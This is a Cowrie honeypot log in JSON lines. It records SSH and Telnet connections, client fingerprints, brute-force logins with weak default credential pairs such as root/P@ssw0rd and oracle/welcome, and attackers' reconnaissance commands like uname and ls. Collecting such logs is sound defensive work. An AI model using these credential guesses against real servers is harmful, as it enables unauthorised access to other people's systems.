{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T04:37:12.701249Z","src_ip":"201.148.180.50","session":"c5e97da419aa"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":42008,"dst_ip":"1.2.3.4","dst_port":22,"session":"3e468da541d1","protocol":"ssh","message":"New connection: 212.227.125.160:42008 (1.2.3.4:22) [session: 3e468da541d1]","sensor":"my-vps","timestamp":"2025-08-31T04:37:17.410444Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T04:37:17.414226Z","src_ip":"212.227.125.160","session":"3e468da541d1"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T04:37:17.592883Z","src_ip":"212.227.125.160","session":"3e468da541d1"}
{"eventid":"cowrie.login.failed","username":"oracle","password":"welcome","message":"login attempt [oracle/welcome] failed","sensor":"my-vps","timestamp":"2025-08-31T04:37:17.765426Z","src_ip":"212.227.235.229","session":"44c4edd62c19"}
{"eventid":"cowrie.session.closed","duration":10.240288019180298,"message":"Connection lost after 10 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:37:18.142744Z","src_ip":"91.231.89.86","session":"2edb4f341a36"}
{"eventid":"cowrie.login.success","username":"root","password":"P@ssw0rd","message":"login attempt [root/P@ssw0rd] succeeded","sensor":"my-vps","timestamp":"2025-08-31T04:37:18.320775Z","src_ip":"212.227.125.160","session":"3e468da541d1"}
{"eventid":"cowrie.login.success","username":"root","password":"6","message":"login attempt [root/6] succeeded","sensor":"my-vps","timestamp":"2025-08-31T04:37:18.550389Z","src_ip":"201.148.180.50","session":"c5e97da419aa"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T04:37:19.144467Z","src_ip":"212.227.125.160","session":"3e468da541d1"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-31T04:37:19.145170Z","src_ip":"212.227.125.160","session":"3e468da541d1"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:37:19.328531Z","src_ip":"212.227.125.160","session":"3e468da541d1"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:37:19.329591Z","src_ip":"212.227.125.160","session":"3e468da541d1"}
{"eventid":"cowrie.session.closed","duration":"8.7","message":"Connection lost after 8.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:37:20.019058Z","src_ip":"212.227.235.229","session":"44c4edd62c19"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T04:37:21.348651Z","src_ip":"201.148.180.50","session":"c5e97da419aa"}
{"eventid":"cowrie.command.input","input":"history | tail -5","message":"CMD: history | tail -5","sensor":"my-vps","timestamp":"2025-08-31T04:37:21.349600Z","src_ip":"201.148.180.50","session":"c5e97da419aa"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/3b6409aecd4af0f82f5af0e783a29453ca4bca7e2fda26224a53d480b46ae991","size":28,"shasum":"3b6409aecd4af0f82f5af0e783a29453ca4bca7e2fda26224a53d480b46ae991","duplicate":true,"duration":"1.4","message":"Closing TTY Log: var/lib/cowrie/tty/3b6409aecd4af0f82f5af0e783a29453ca4bca7e2fda26224a53d480b46ae991 after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:37:22.742940Z","src_ip":"201.148.180.50","session":"c5e97da419aa"}
{"eventid":"cowrie.session.closed","duration":"11.4","message":"Connection lost after 11.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:37:22.744023Z","src_ip":"201.148.180.50","session":"c5e97da419aa"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":43536,"dst_ip":"1.2.3.4","dst_port":22,"session":"0422cc68c7dc","protocol":"ssh","message":"New connection: 212.227.125.160:43536 (1.2.3.4:22) [session: 0422cc68c7dc]","sensor":"my-vps","timestamp":"2025-08-31T04:37:26.994554Z"}
{"eventid":"cowrie.login.success","username":"root","password":"Lol","message":"login attempt [root/Lol] succeeded","sensor":"my-vps","timestamp":"2025-08-31T04:37:28.024955Z","src_ip":"79.127.48.196","session":"6bd097722e47"}
{"eventid":"cowrie.session.closed","duration":31.439707279205322,"message":"Connection lost after 31 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:37:30.148532Z","src_ip":"212.227.235.229","session":"6757bce91056"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":62680,"dst_ip":"1.2.3.4","dst_port":22,"session":"9f6f74de9bc9","protocol":"ssh","message":"New connection: 212.227.235.229:62680 (1.2.3.4:22) [session: 9f6f74de9bc9]","sensor":"my-vps","timestamp":"2025-08-31T04:37:31.774827Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":55792,"dst_ip":"1.2.3.4","dst_port":22,"session":"89c67570278e","protocol":"ssh","message":"New connection: 212.227.125.160:55792 (1.2.3.4:22) [session: 89c67570278e]","sensor":"my-vps","timestamp":"2025-08-31T04:37:32.215759Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T04:37:32.704431Z","src_ip":"212.227.125.160","session":"89c67570278e"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T04:37:32.763515Z","src_ip":"212.227.125.160","session":"89c67570278e"}
{"eventid":"cowrie.session.connect","src_ip":"91.231.89.87","src_port":40207,"dst_ip":"1.2.3.4","dst_port":23,"session":"d3ba98d1bcaf","protocol":"telnet","message":"New connection: 91.231.89.87:40207 (1.2.3.4:23) [session: d3ba98d1bcaf]","sensor":"my-vps","timestamp":"2025-08-31T04:37:32.813319Z"}
{"eventid":"cowrie.session.closed","duration":0.0019216537475585938,"message":"Connection lost after 0 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:37:32.815175Z","src_ip":"91.231.89.87","session":"d3ba98d1bcaf"}
{"eventid":"cowrie.session.connect","src_ip":"91.231.89.82","src_port":47945,"dst_ip":"1.2.3.4","dst_port":23,"session":"1af3b27a2d0d","protocol":"telnet","message":"New connection: 91.231.89.82:47945 (1.2.3.4:23) [session: 1af3b27a2d0d]","sensor":"my-vps","timestamp":"2025-08-31T04:37:32.855231Z"}
{"eventid":"cowrie.login.failed","username":"testuser","password":"testuser","message":"login attempt [testuser/testuser] failed","sensor":"my-vps","timestamp":"2025-08-31T04:37:34.375865Z","src_ip":"212.227.235.229","session":"963dfef37502"}
{"eventid":"cowrie.login.failed","username":"oracle","password":"welcome","message":"login attempt [oracle/welcome] failed","sensor":"my-vps","timestamp":"2025-08-31T04:37:35.272896Z","src_ip":"212.227.125.160","session":"89c67570278e"}
{"eventid":"cowrie.session.closed","duration":3.005627393722534,"message":"Connection lost after 3 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:37:35.860781Z","src_ip":"91.231.89.82","session":"1af3b27a2d0d"}
{"eventid":"cowrie.session.closed","duration":"4.5","message":"Connection lost after 4.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:37:36.760446Z","src_ip":"212.227.125.160","session":"89c67570278e"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T04:37:38.117574Z","src_ip":"212.227.125.160","session":"0422cc68c7dc"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T04:37:38.146154Z","src_ip":"212.227.125.160","session":"0422cc68c7dc"}
{"eventid":"cowrie.session.closed","duration":"59.3","message":"Connection lost after 59.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:37:41.345334Z","src_ip":"212.227.235.229","session":"963dfef37502"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T04:37:44.527249Z","src_ip":"79.127.48.196","session":"6bd097722e47"}
{"eventid":"cowrie.command.input","input":"ls -la /","message":"CMD: ls -la /","sensor":"my-vps","timestamp":"2025-08-31T04:37:44.527925Z","src_ip":"79.127.48.196","session":"6bd097722e47"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T04:37:48.459564Z","src_ip":"212.227.235.229","session":"9f6f74de9bc9"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T04:37:48.460434Z","src_ip":"212.227.235.229","session":"9f6f74de9bc9"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":37714,"dst_ip":"1.2.3.4","dst_port":22,"session":"be7d1275da50","protocol":"ssh","message":"New connection: 212.227.125.160:37714 (1.2.3.4:22) [session: be7d1275da50]","sensor":"my-vps","timestamp":"2025-08-31T04:37:49.251101Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T04:37:49.252060Z","src_ip":"212.227.125.160","session":"be7d1275da50"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T04:37:49.439746Z","src_ip":"212.227.125.160","session":"be7d1275da50"}
{"eventid":"cowrie.login.failed","username":"hadoop","password":"hadoop","message":"login attempt [hadoop/hadoop] failed","sensor":"my-vps","timestamp":"2025-08-31T04:37:50.004142Z","src_ip":"212.227.125.160","session":"be7d1275da50"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":53704,"dst_ip":"1.2.3.4","dst_port":22,"session":"a3c206da003f","protocol":"ssh","message":"New connection: 212.227.235.229:53704 (1.2.3.4:22) [session: a3c206da003f]","sensor":"my-vps","timestamp":"2025-08-31T04:37:50.463475Z"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:37:51.193968Z","src_ip":"212.227.125.160","session":"be7d1275da50"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/352110e27ca54240da15349cfe3b896942c0edeb85990b5868f21c885813869f","size":1347,"shasum":"352110e27ca54240da15349cfe3b896942c0edeb85990b5868f21c885813869f","duplicate":true,"duration":"13.9","message":"Closing TTY Log: var/lib/cowrie/tty/352110e27ca54240da15349cfe3b896942c0edeb85990b5868f21c885813869f after 13.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:37:58.391921Z","src_ip":"79.127.48.196","session":"6bd097722e47"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":39756,"dst_ip":"1.2.3.4","dst_port":22,"session":"2ed4700720eb","protocol":"ssh","message":"New connection: 212.227.125.160:39756 (1.2.3.4:22) [session: 2ed4700720eb]","sensor":"my-vps","timestamp":"2025-08-31T04:38:08.795201Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T04:38:08.796112Z","src_ip":"212.227.125.160","session":"2ed4700720eb"}
{"eventid":"cowrie.session.closed","duration":"114.5","message":"Connection lost after 114.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:38:08.866766Z","src_ip":"79.127.48.196","session":"6bd097722e47"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T04:38:08.984627Z","src_ip":"212.227.125.160","session":"2ed4700720eb"}
{"eventid":"cowrie.login.success","username":"root","password":"Aa123456","message":"login attempt [root/Aa123456] succeeded","sensor":"my-vps","timestamp":"2025-08-31T04:38:09.552065Z","src_ip":"212.227.125.160","session":"2ed4700720eb"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":44812,"dst_ip":"1.2.3.4","dst_port":22,"session":"de312b137d00","protocol":"ssh","message":"New connection: 212.227.235.229:44812 (1.2.3.4:22) [session: de312b137d00]","sensor":"my-vps","timestamp":"2025-08-31T04:38:09.596646Z"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T04:38:09.945219Z","src_ip":"212.227.125.160","session":"2ed4700720eb"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-31T04:38:09.945903Z","src_ip":"212.227.125.160","session":"2ed4700720eb"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:38:10.143287Z","src_ip":"212.227.125.160","session":"2ed4700720eb"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:38:10.144383Z","src_ip":"212.227.125.160","session":"2ed4700720eb"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T04:38:10.376226Z","src_ip":"212.227.235.229","session":"a3c206da003f"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T04:38:10.377057Z","src_ip":"212.227.235.229","session":"a3c206da003f"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T04:38:10.479396Z","src_ip":"212.227.235.229","session":"de312b137d00"}
